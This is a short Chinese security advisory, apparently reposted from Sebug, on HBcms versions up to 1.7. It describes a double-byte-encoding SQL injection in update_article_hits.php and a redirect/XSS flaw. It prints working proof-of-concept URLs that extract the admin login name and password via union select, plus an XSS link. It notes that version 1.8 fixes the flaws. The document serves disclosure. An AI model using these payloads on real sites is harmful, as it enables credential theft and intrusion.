HBcms宏博内容管理系统SQL injection and XSS

来源:岁月联盟 编辑:zhuzhu 时间:2009-11-30
HBcms宏博内容管理系统SQL injection and XSS 影响版本:
<=1.7版本漏洞描述:
update_article_hits.php中的article_id参数没有严格过滤导致可利用双字节编码漏洞注入<*参考 
详细说明:http://hi.baidu.com/menzhi007/blog/item/4ce3a8022578b6054bfb5190.html
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!poc:

查询账号:
http://127.0.0.1/cms/hbcms/php/update_article_hits.php?show_hits=yes&article_id=-1%e5" union select login_name from hbcms_users where id=1%23
查询密码:
http://127.0.0.1/cms/hbcms/php/update_article_hits.php?show_hits=yes&article_id=-1%e5" union select login_pass from hbcms_users where id=1%23
xss:
http://www.hbcms.com/hbcms/php/r.php?url=http://hi.baidu.com/menzhi007SEBUG安全建议:
官方已经修复 请下载1.8版本

上一篇:深度学习(asp)网址导航 v3.0.4 存在Sql注入漏洞
下一篇:Dreamweaver MX/DRK/UltraDev Server跨站脚本执行漏洞

最近更新

随机推荐